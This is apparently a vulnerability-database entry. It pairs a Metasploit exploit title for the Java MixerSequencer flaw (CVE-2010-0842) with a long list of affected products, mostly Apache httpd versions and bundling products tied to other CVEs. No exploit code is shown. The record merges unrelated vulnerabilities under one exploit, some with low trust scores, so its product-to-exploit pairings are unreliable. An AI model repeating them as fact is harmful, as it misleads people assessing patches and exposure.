Details of VAR-E-201110-0794

ID

VAR-E-201110-0794

CVE

cve_id:	CVE-2010-0842	Trust: 1.0
cve_id:	CVE-2012-0053	Trust: 0.8
cve_id:	CVE-2011-3368	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 18485

EDB ID

18485

TITLE

Java MixerSequencer Object - GM_Song Structure Handling (Metasploit) - Windows remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 18485

DESCRIPTION

Java MixerSequencer Object - GM_Song Structure Handling (Metasploit). CVE-2010-0842CVE-63493 . remote exploit for Windows platform

Trust: 1.0

sources: EXPLOIT-DB: 18485

AFFECTED PRODUCTS

vendor:	hitachi	model:	web server	scope:	eq	version:	02-03	Trust: 1.8
vendor:	hitachi	model:	web server 02-04-/a	scope:	-	version:	-	Trust: 1.5
vendor:	hitachi	model:	web server	scope:	eq	version:	02-02	Trust: 1.2
vendor:	hitachi	model:	web server	scope:	eq	version:	02-01	Trust: 1.2
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1	Trust: 1.2
vendor:	java	model:	mixersequencer object	scope:	-	version:	-	Trust: 1.0
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/c	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/b	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/a	scope:	-	version:	-	Trust: 0.9
vendor:	ubuntu	model:	linux lts sparc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts powerpc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts lpia	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.6
vendor:	slackware	model:	linux x86 64 -current	scope:	-	version:	-	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.2	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.0	Trust: 0.6
vendor:	slackware	model:	linux -current	scope:	-	version:	-	Trust: 0.6
vendor:	redhat	model:	enterprise linux desktop workstation client	scope:	eq	version:	5	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server x86 64	scope:	eq	version:	5	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server	scope:	eq	version:	5	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.3	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	04-00	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server 02-04-/b	scope:	-	version:	-	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	02-04	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	01-02	Trust: 0.6
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage job workload server	scope:	eq	version:	8.1	Trust: 0.6
vendor:	fujitsu	model:	interstage business application server enterprise	scope:	eq	version:	8.0.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition 6.0a	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition a	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0	Trust: 0.6
vendor:	debian	model:	linux sparc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux s/390	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux powerpc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux mips	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-32	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux arm	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux amd64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.2	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	8.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	7.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.3	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.0	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura experience portal	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.2	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.3	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.2	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.8	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.4	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	4.0	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3	Trust: 0.6
vendor:	apache	model:	protocol.c cookie	scope:	-	version:	-	Trust: 0.5
vendor:	xerox	model:	freeflow print server 73.c0.41	scope:	-	version:	-	Trust: 0.3
vendor:	xerox	model:	freeflow print server 73.b3.61	scope:	-	version:	-	Trust: 0.3
vendor:	suse	model:	linux enterprise server for vmware sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.0	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.7.9	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	juniper	model:	nsmexpress	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	nsm3000	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	network and security manager software	scope:	eq	version:	2012.2-	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.1	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.20	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.1.0	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.5	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.0	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.4.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.3.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.1	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.55	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.50	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.31	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-01(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00-060	Trust: 0.3
vendor:	hitachi	model:	web server security enhancement 02-04-/b	scope:	eq	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00-05	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00-04	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	04-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10-09	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-05	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	02-05	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/c	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/a (windows(ip	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-04	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-03	Trust: 0.3
vendor:	hitachi	model:	web server 01-02-/d	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	cosminexus developer no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus application server no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	9.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	8.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.3.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	7.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.3	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip wom hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip psm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.40	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip asm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip apm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip analytics 11.0.0-hf2	scope:	-	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.0.0	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.4	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.3	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.2	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.51	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.46	Trust: 0.3
